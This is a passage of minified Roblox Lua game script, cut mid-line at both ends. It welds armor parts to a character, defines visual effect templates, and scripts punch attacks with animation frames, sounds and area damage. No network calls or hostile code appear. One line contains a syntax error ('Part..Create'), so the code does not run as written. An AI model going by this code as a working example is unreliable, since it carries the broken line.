"Camo","Wedge",Vector3.new(0.200000003,0.200000003,0.200000003))WedgeWeld=CFuncs.Weld.Create(m,LHandleR,Wedge,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.604999542,-0.504998207,0.29499054,-2.98023224E-8,-6.70552254E-8,-1.00000012,3.7252903E-8,1.0000006,7.4505806E-8,1,4.47034836E-8,2.98023224E-8))CFuncs.Mesh.Create("SpecialMesh",Wedge,Enum.MeshType.Wedge,"",Vector3.new(0,0,0),Vector3.new(1,1,1))Wedge=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Wedge",Vector3.new(0.200000003,0.200000003,0.200000003))WedgeWeld=CFuncs.Weld.Create(m,LHandleR,Wedge,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.60499382,-0.495001793,0.305000305,-5.96046519E-8,-1.41561088E-7,-1.00000024,-8.19564079E-8,-1.00000119,-1.41561088E-7,-1,-8.19564079E-8,-5.96046519E-8))CFuncs.Mesh.Create("SpecialMesh",Wedge,Enum.MeshType.Wedge,"",Vector3.new(0,0,0),Vector3.new(1,1,1))Wedge=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Wedge",Vector3.new(0.200000003,0.200000003,0.200000003))WedgeWeld=CFuncs.Weld.Create(m,LHandleR,Wedge,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.604999542,-0.495001793,0.29499054,2.98023224E-8,6.70552254E-8,1.00000012,-3.7252903E-8,-1.0000006,-7.4505806E-8,1,4.47034836E-8,2.98023224E-8))CFuncs.Mesh.Create("SpecialMesh",Wedge,Enum.MeshType.Wedge,"",Vector3.new(0,0,0),Vector3.new(1,1,1))Wedge=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Wedge",Vector3.new(0.200000003,0.200000003,0.200000003))WedgeWeld=CFuncs.Weld.Create(m,LHandleR,Wedge,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.604999542,-0.504998207,0.305000305,2.98023224E-8,6.70552254E-8,1.00000012,3.7252903E-8,1.0000006,7.4505806E-8,-1,-4.47034836E-8,-2.98023224E-8))CFuncs.Mesh.Create("SpecialMesh",Wedge,Enum.MeshType.Wedge,"",Vector3.new(0,0,0),Vector3.new(1,1,1))LHandleL=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","LHandleL",Vector3.new(1.02999997,1.00999999,1.19000006))LHandleLWeld=CFuncs.Weld.Create(m,LeftLeg,LHandleL,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.00498199463,-0.095000267,0.00502204895,-1,8.19564079E-8,-5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,-5.96046519E-8,1.41561088E-7,-1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(1.02999997,1.00999999,1.19000006))PartWeld=CFuncs.Weld.Create(m,LHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0,0.600001335,0,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.400000006,1.20000005,0.300000012))PartWeld=CFuncs.Weld.Create(m,LHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.00499725342,-0.00500106812,-0.554998398,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(1.02999997,0.699999928,1.19000006))PartWeld=CFuncs.Weld.Create(m,LHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0,-0.454999924,0,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.800000131,1.20000005,0.800000012))PartWeld=CFuncs.Weld.Create(m,LHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.00499534607,0.0149993896,0.00500297546,2.28095047E-7,1.00000775,2.99581131E-7,-1.00000417,5.63755016E-8,-4.06898749E-7,-2.98379774E-7,2.07959161E-8,1.0000037))CFuncs.Mesh.Create("CylinderMesh",Part,"","",Vector3.new(0,0,0),Vector3.new(1,1,1))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.800000012,0.800000012,0.300000012))PartWeld=CFuncs.Weld.Create(m,LHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.00498962402,-0.00500106812,-0.554998398,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Wedge=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Wedge",Vector3.new(0.300000012,0.200000003,0.200000003))WedgeWeld=CFuncs.Weld.Create(m,LHandleL,Wedge,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.554998398,-0.505000114,0.305000305,2.98023224E-8,6.70552254E-8,1.00000012,3.7252903E-8,1.0000006,7.4505806E-8,-1,-4.47034836E-8,-2.98023224E-8))CFuncs.Mesh.Create("SpecialMesh",Wedge,Enum.MeshType.Wedge,"",Vector3.new(0,0,0),Vector3.new(1,1,1))Wedge=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Wedge",Vector3.new(0.300000012,0.200000003,0.200000003))WedgeWeld=CFuncs.Weld.Create(m,LHandleL,Wedge,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.554998398,-0.505000114,0.29499054,-2.98023224E-8,-6.70552254E-8,-1.00000012,3.7252903E-8,1.0000006,7.4505806E-8,1,4.47034836E-8,2.98023224E-8))CFuncs.Mesh.Create("SpecialMesh",Wedge,Enum.MeshType.Wedge,"",Vector3.new(0,0,0),Vector3.new(1,1,1))Wedge=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Wedge",Vector3.new(0.300000012,0.200000003,0.200000003))WedgeWeld=CFuncs.Weld.Create(m,LHandleL,Wedge,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.554998398,-0.494999886,0.29499054,2.98023224E-8,6.70552254E-8,1.00000012,-3.7252903E-8,-1.0000006,-7.4505806E-8,1,4.47034836E-8,2.98023224E-8))CFuncs.Mesh.Create("SpecialMesh",Wedge,Enum.MeshType.Wedge,"",Vector3.new(0,0,0),Vector3.new(1,1,1))Wedge=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Wedge",Vector3.new(0.300000012,0.200000003,0.200000003))WedgeWeld=CFuncs.Weld.Create(m,LHandleL,Wedge,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.554998398,-0.494999886,0.305000305,-5.96046519E-8,-1.41561088E-7,-1.00000024,-8.19564079E-8,-1.00000119,-1.41561088E-7,-1,-8.19564079E-8,-5.96046519E-8))CFuncs.Mesh.Create("SpecialMesh",Wedge,Enum.MeshType.Wedge,"",Vector3.new(0,0,0),Vector3.new(1,1,1))Shield=CFuncs.Part.Create(m,"Neon",0,0.5,"Cool yellow","Part",Vector3.new(9.1,8.5,0.2))CFuncs.Mesh.Create("SpecialMesh",Shield,"FileMesh","rbxassetid://708292865",Vector3.new(0,0,0),Vector3.new(0.04,0.04,0.04))Shield.Parent=nil;EffectModel=Create("Model")({Parent=Character,Name="Effects"})Effects={Block={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay,gf)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("BlockMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)if gf==1 or gf==nil then table.insert(Effects,{jv,"Block1",delay,js,jt,ju,msh})elseif gf==2 then table.insert(Effects,{jv,"Block2",delay,js,jt,ju,msh})end end},Cylinder={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part..Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new(0.2,0.2,0.2))jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("CylinderMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,2)Effects[#Effects+1]={jv,"Cylinder",delay,js,jt,ju}end},Head={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("SpecialMesh",jv,"Head","nil",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Cylinder",delay,js,jt,ju,msh})end},Sphere={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("SpecialMesh",jv,"Sphere","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Cylinder",delay,js,jt,ju,msh})end},Sphere2={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("SpecialMesh",jv,"Sphere","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Cylinder",delay,js,jt,ju,msh})end},Elec={Create=function(pq,x,iP,z)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,BrickColor.new("Cool yellow"),"Part",Vector3.new(1,1,1))jv.Anchored=true;jv.CFrame=pq*CFrame.new(math.random(-x,x),math.random(-iP,iP),math.random(-z,z))jv.CFrame=CFrame.new(jv.Position)game:GetService("Debris"):AddItem(jv,2)local pr=math.random()/2;local ps=math.random()/2;local pt=math.random()/2;local msh=CFuncs.Mesh.Create("BlockMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(pr,ps,pt))table.insert(Effects,{jv,"Elec",0.1,x,iP,z,pr,ps,pt})end},Ring={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part.Create(EffectModel,"SmoothPlastic",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("CylinderMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Cylinder",delay,js,jt,ju,msh})end},Wave={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part.Create(EffectModel,"SmoothPlastic",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("SpecialMesh",jv,"FileMesh","rbxassetid://20329976",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Cylinder",delay,js,jt,ju,msh})end},Break={Create=function(jm,jn,jo,jq,jr)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new(0.5,0.5,0.5))jv.Anchored=true;jv.CFrame=jn*CFrame.fromEulerAnglesXYZ(math.random(-50,50),math.random(-50,50),math.random(-50,50))local msh=CFuncs.Mesh.Create("SpecialMesh",jv,"Sphere","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))local bA=math.random(10,50)/1000;game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Shatter",bA,jv.CFrame,math.random()-math.random(),0,math.random(50,100)/100})end},Fire={Create=function(jm,jn,jo,jq,jr,delay)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;msh=CFuncs.Mesh.Create("BlockMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Fire",delay,1,1,1,msh})end},FireWave={Create=function(jm,jn,jo,jq,jr)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,1,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;msh=CFuncs.Mesh.Create("BlockMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))local pd=Create("Decal")({Parent=jv,Texture="rbxassetid://26356434",Face="Top"})local pd=Create("Decal")({Parent=jv,Texture="rbxassetid://26356434",Face="Bottom"})game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"FireWave",1,30,math.random(400,600)/100,msh})end},Lightning={Create=function(pu,p1,pv,pw,px,py,pz,ij)local pA=(pu-p1).magnitude;local pB=pu;local pC={-pw,pw}for T=1,pv do local pD=CFuncs.Part.Create(EffectModel,"Neon",0,pz or 0.4,px,"Ref",Vector3.new(py,py,pA/pv))local pE=Vector3.new(pC[math.random(1,2)],pC[math.random(1,2)],pC[math.random(1,2)])local pF=CFrame.new(pB,p1)*CFrame.new(0,0,pA/pv).p+pE;pD.Material="Neon"if pv==T then local pG=(pB-p1).magnitude;pD.Size=Vector3.new(py,py,pG)pD.CFrame=CFrame.new(pB,p1)*CFrame.new(0,0,-pG/2)table.insert(Effects,{pD,"Disappear",ij})else pD.CFrame=CFrame.new(pB,pF)*CFrame.new(0,0,pA/pv/2)pB=pD.CFrame*CFrame.new(0,0,pA/pv/2).p;game.Debris:AddItem(pD,10)table.insert(Effects,{pD,"Disappear",ij})end end end},EffectTemplate={}}local pH=true;function Reappear()for U,T in pairs(AdvancingFortress:children())do if T:IsA("BasePart")then Character.AdvancingFortress.FTorso.Anchored=false;coroutine.resume(coroutine.create(function(Part)for T=0,1,0.3 do swait()Part.Transparency=1 end;Part.Transparency=1 end),1)end end;for U,T in pairs(m:children())do if T:IsA("BasePart")then coroutine.resume(coroutine.create(function(Part)for T=0,1,0.3 do swait()Part.Transparency=1 end;Part.Transparency=1 end),T)end end end;function ReappearArmorOnly()for U,T in pairs(m:children())do if T:IsA("BasePart")then coroutine.resume(coroutine.create(function(Part)for T=0,1,0.3 do swait()Part.Transparency=1 end;Part.Transparency=1 end),T)end end end;function Disappear()for U,T in pairs(AdvancingFortress:children())do if T:IsA("BasePart")then Character.AdvancingFortress.FHumanoidRootPart.Position=Character.AdvancingFortress.FHumanoidRootPart.Position+Vector3.new(0,100,0)wait(0.1)Character.AdvancingFortress.FTorso.Anchored=true;coroutine.resume(coroutine.create(function(Part)for T=0,1,0.3 do swait()Part.Transparency=1 end;Part.Transparency=1 end),T)end end;for U,T in pairs(m:children())do if T:IsA("BasePart")then coroutine.resume(coroutine.create(function(Part)for T=0,1,0.3 do swait()Part.Transparency=1 end;Part.Transparency=1 end),T)end end end;function DisappearArmorOnly()for U,T in pairs(m:children())do if T:IsA("BasePart")then coroutine.resume(coroutine.create(function(Part)for T=0,1,0.3 do swait()Part.Transparency=1 end;Part.Transparency=1 end),T)end end end;Character.Effects:Destroy()function CamShake(pI,pJ)coroutine.resume(coroutine.create(function()local cam=game:GetService("Workspace").CurrentCamera;local pI=10;local pK=Vector3.new(math.random(100,200)/pJ,math.random(100,200)/pJ,0)if math.random(1,2)==1 then pK=Vector3.new(-pK.x,pK.y,0)end;if math.random(1,2)==1 then pK=Vector3.new(pK.x,-pK.y,0)end;cam.CoordinateFrame=CFrame.new(cam.Focus.p)*(cam.CoordinateFrame-cam.CoordinateFrame.p)*CFrame.fromEulerAnglesXYZ(pK.x*pI,pK.y*pI,0)*CFrame.new(0,0,(cam.CoordinateFrame.p-cam.Focus.p).magnitude)for T=1,pI do cam.CoordinateFrame=CFrame.new(cam.Focus.p)*(cam.CoordinateFrame-cam.CoordinateFrame.p)*CFrame.fromEulerAnglesXYZ(-pK.x,-pK.y,0)*CFrame.new(0,0,(cam.CoordinateFrame.p-cam.Focus.p).magnitude)wait()end end))end;local pL=false;function ORA()Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0.01)dS=true;local dA=CFuncs.Sound.Create("0",Torso,1,1)dA.Looped=true;if pL==true then while pL==true do CFuncs.Sound.Create("200632136",HitboxL,0.3,math.random(1,1.2))MagnitudeDamage(HitboxL,5,4,10,0,"Normal","260430117",1)for T=0,1,0.8 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-4),0.5)PlayAnimationFromTable({CFrame.new(-0.561874092,-0.346845925,-0.435822666,0.64278698,-0.323744029,0.694272816,0,0.906308115,0.422617555,-0.766044974,-0.271653026,0.582563102)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(8.9481473E-6,1.49999249,5.2684918E-6,0.704669476,0.0560214818,-0.707321048,-0.0868221819,0.996195257,-0.0075956285,0.704204142,0.0667634308,0.706852198)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.97048378,0.808467984,-0.254994273,-0.457079947,-0.7819345,0.423859,0.842444837,-0.227779076,0.488266319,-0.285246044,0.580254436,0.762849629)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.18535733,0.530705392,-0.713678956,0.778861284,-0.400152355,0.482962847,0.492400557,-0.0868335962,-0.866026342,0.388479888,0.912325621,0.129403993)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.708622813,-1.45549953,-0.199998885,0.984808087,-0.167729571,-0.0449446738,0.173646823,0.951251328,0.254887581,1.4603138E-6,-0.258819878,0.965925694)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.604502141,-1.943735,5.15520573E-4,0.982544005,0.00845471025,0.185841322,-0.0717865527,0.938827574,0.336824685,-0.17162481,-0.34428525,0.923045695)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.8,false)end;CFuncs.Sound.Create("200632136",HitboxR,0.3,math.random(1,1.2))MagnitudeDamage(HitboxR,5,4,10,0,"Normal","260430117",1)for T=0,1,0.8 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-4),0.5)PlayAnimationFromTable({CFrame.new(1.1920929E-6,-0.0170394331,-0.52941519,0.70710516,-2.21270369E-7,-0.707108498,0.18301405,0.965925574,0.183012888,0.683014154,-0.258820117,0.683010995)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.22189522E-6,1.49999356,1.04308128E-6,0.707110465,0.122788236,0.696360528,-1.4748274E-6,0.98480773,-0.173648238,-0.707103193,0.122787461,0.696368098)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.44562268,0.333473027,-0.475224167,0.907739162,0.217196256,0.358959734,0.40125221,-0.199453548,-0.893991232,-0.122576535,0.955528319,-0.268199235)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.884794,0.881342709,-0.770847201,0.0912726,0.688403964,-0.719562054,-0.91795665,-0.221949756,-0.328776807,-0.386037856,0.690535009,0.611666858)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.789779902,-1.8586235,0.161380947,0.965926766,-0.258817255,-8.10623169E-6,0.243211254,0.907672405,0.342022836,-0.0885141194,-0.330371499,0.939691722)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.73783946,-1.45406294,-0.215006173,0.882573366,-0.0180292428,0.469829261,-0.163172901,0.925412893,0.342031717,-0.440952569,-0.378531486,0.813802838)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.8,false)end;CFuncs.Sound.Create("200632136",HitboxL,0.3,math.random(1,1.2))MagnitudeDamage(HitboxL,5,4,10,0,"Normal","260430117",1)for T=0,1,0.8 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-4),0.5)PlayAnimationFromTable({CFrame.new(0.215482175,-0.0393944569,-0.126133978,0.259671897,-0.351393819,0.8994959,-0.075478971,0.921212733,0.381667405,-0.962742627,-0.167001322,0.212690249)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.26510859E-5,1.49999118,-2.16066837E-7,0.420251548,-0.0215960592,-0.90715003,-0.100918382,0.992402375,-0.0703775883,0.901778162,0.12112467,0.414879382)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.81840861,0.705381036,-0.347923756,-0.236346364,-0.883376777,0.404705286,0.945798516,-0.113677993,0.304209948,-0.222726092,0.454668403,0.862362981)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.21960759,0.420275182,-0.728423595,-0.57802856,-0.255150676,0.775100708,0.665436089,-0.697164714,0.266751111,0.472311139,0.669969678,0.572767615)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.620917439,-1.53014767,-0.12091887,0.707106113,0.241845652,-0.66446346,-1.2293458E-6,0.939692676,0.342019886,0.707107484,-0.241843566,0.664462805)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.873213649,-1.89646459,-0.100004375,0.933012128,0.353242815,-0.0686147735,-0.258823931,0.791241407,0.554028153,0.249997303,-0.499155849,0.829665601)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.8,false)end;CFuncs.Sound.Create("200632136",HitboxR,0.3,math.random(1,1.2))MagnitudeDamage(HitboxR,5,4,10,0,"Normal","260430117",1)for T=0,1,0.8 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-4),0.5)PlayAnimationFromTable({CFrame.new(0.299998224,-0.0468490347,-0.211314023,0.642786682,-2.87348001E-7,-0.766045272,0.323744863,0.906307757,0.271653205,0.694272637,-0.42261824,0.582562685)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(2.71201134E-6,1.4999969,8.94069672E-7,0.642777503,0.133020476,0.754416466,4.31999706E-6,0.984809279,-0.173647597,-0.766052961,0.111620098,0.633012772)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.27057993,0.327670783,-0.599993467,0.638493001,0.280156553,-0.716825664,-0.769049883,0.196164608,-0.608343422,-0.0298155248,0.939697862,0.340704083)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.86040878,1.02262986,-0.452570885,0.386218816,0.717701018,-0.579433978,-0.403004408,-0.433759809,-0.805879354,-0.829712272,0.544763446,0.121709965)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.779964924,-1.75316048,-0.0263362825,0.826099217,-0.36394459,0.43023771,0.181541473,0.894650102,0.40822047,-0.533481896,-0.259124577,0.805140793)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.724003315,-1.47219872,-0.266945302,0.766038954,-0.166370958,0.620890498,4.09781933E-6,0.965925932,0.258819997,-0.642794192,-0.198263675,0.739937425)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.8,false)end;CFuncs.Sound.Create("200632136",HitboxL,0.3,math.random(1,1.2))MagnitudeDamage(HitboxL,5,4,10,0,"Normal","260430117",1)end end;dA:Stop()local pM=CFuncs.Sound.Create("0",Torso,1.5,1)Instance.new("DistortionSoundEffect",pM).Level=0.8;for T=0,1,0.13 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-3),0.5)PlayAnimationFromTable({CFrame.new(2.68220901E-6,-0.0739577487,0.0232374109,0.707105994,-3.47710994E-7,-0.707107604,-0.122787997,0.98480767,-0.122788213,0.696364999,0.173648596,0.696363389)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-5.36441803E-7,1.49999356,-1.28149986E-6,0.707105994,-0.122788511,0.696365297,-3.47710994E-7,0.984808028,0.173649326,-0.707107604,-0.122788727,0.696363688)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.13747835,0.382733107,-0.729447305,0.579597414,0.772029877,-0.260839432,-0.351051509,-0.0523141921,-0.934893906,-0.735411942,0.633429527,0.240701318)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.53455412,0.605712295,-0.542039633,0.786121905,0.427828372,-0.446066588,-0.606968522,0.398195386,-0.687771559,-0.116626531,0.811420619,0.572708428)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.903839946,-1.70734286,0.373858094,0.863655448,-0.430708885,0.261895239,0.187955216,0.757234871,0.625514567,-0.46773085,-0.491004646,0.734943748)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.596739769,-1.62411702,-0.0967329144,0.725493789,-0.291957259,0.623233199,-0.081900157,0.86250174,0.499382436,-0.683338165,-0.41334182,0.601828396)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.2,false)end;CFuncs.Sound.Create("0",HitboxR,1,1)MagnitudeDamage(HitboxR,7,10,15,50,"Normal","610359590",1)for T=0,1,0.1 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-5),0.3)PlayAnimationFromTable({CFrame.new(-0.338160992,-0.0772590488,-0.484170675,0.307024002,-0.153706044,0.939207554,-0.403236002,0.872901201,0.274671286,-0.86205399,-0.463052958,0.206021816)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.0502282679,1.50051379,-0.0864891857,0.502356887,-0.246090144,-0.828901231,-0.00520065427,0.957766473,-0.287500501,0.864644766,0.148738697,0.479860842)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.81698525,1.20575511,-0.168038458,0.0800605565,-0.859217465,0.505307972,0.457053572,-0.418860257,-0.784640014,0.885828495,0.293771386,0.359173566)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.66351938,0.691055655,0.203685582,0.309526145,0.793331623,-0.524231553,-0.937197804,0.347743452,-0.0271089375,0.160791725,0.499699503,0.851144433)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.971616864,-1.6145575,0.096719563,0.544056833,-0.203144252,-0.814085484,0.51142931,0.849463344,0.129818588,0.665161908,-0.486975014,0.566052973)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.676943898,-1.44413579,0.206094518,0.884253025,0.0570309162,-0.463512957,0.209485695,0.838620007,0.502824426,0.417387724,-0.541723251,0.729605079)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.6,false)end;dS=false end;function CastleCrusherFist()dS=true;pk=true;local pM=CFuncs.Sound.Create("0",Torso,1,1)Instance.new("DistortionSoundEffect",pM).Level=0.8;for T=0,1,0.1 do swait()Effects.Block.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,1,1,1,4,4,4,0.3,1)Effects.Break.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,0.5,0.5,0.5)RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-2),0.2)PlayAnimationFromTable({CFrame.new(-5.99771738E-7,-0.00717129931,0.169464022,0.422617912,-2.2671E-7,-0.906308055,-0.309975952,0.939692557,-0.144544229,0.851650834,0.342020661,0.397130787)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.0102166235,1.52751005,-0.239579424,0.456926107,-0.171424359,0.872835577,-0.167732254,0.94705075,0.273807496,-0.87355268,-0.271512181,0.403976858)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.944673777,0.474064022,-0.539126158,0.229199454,0.762564063,0.604949772,0.809601307,0.195682317,-0.553402781,-0.540382624,0.616607308,-0.572522938)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.61232829,0.309644789,-0.24482432,0.455398798,0.536860108,-0.710207343,-0.887026072,0.205374956,-0.413530886,-0.076149486,0.818293095,0.569735885)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.08113468,-1.48232126,0.656104684,0.81421864,-0.517612338,0.262917578,0.175395042,0.651024699,0.738514543,-0.553430021,-0.555197835,0.620862961)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.427128136,-1.50760674,-0.0473105907,0.804508269,-0.373179317,0.462065101,-0.173640698,0.596196175,0.783836842,-0.567992628,-0.71083647,0.414845526)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.2,false)end;MagnitudeDamage(HitboxR,10,50,80,100,"Normal","610359515",1)Effects.Wave.Create(BrickColor.new("Cool 